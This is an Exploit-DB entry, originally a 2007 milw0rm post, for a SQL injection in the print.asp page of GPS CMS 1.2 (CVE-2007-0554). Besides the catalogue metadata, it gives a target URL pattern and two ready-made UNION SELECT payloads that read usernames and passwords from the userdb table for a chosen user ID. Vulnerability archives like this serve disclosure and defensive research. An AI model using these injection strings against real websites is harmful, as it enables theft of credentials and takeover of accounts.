GPS CMS 1.2 - 'print.asp' SQL Injection
Author: ajann
type: webapps
platform: asp
port:
date_added: 2007-01-24
date_updated: 2016-09-21
verified: 1
codes: OSVDB-31635;CVE-2007-0554
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGPS_1_2_-_557492172002.zip
*******************************************************************************
# Title : GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.guox.de || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7227&lngWId=4
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//print.asp?id=[SQL]
Example:
//print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
//print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]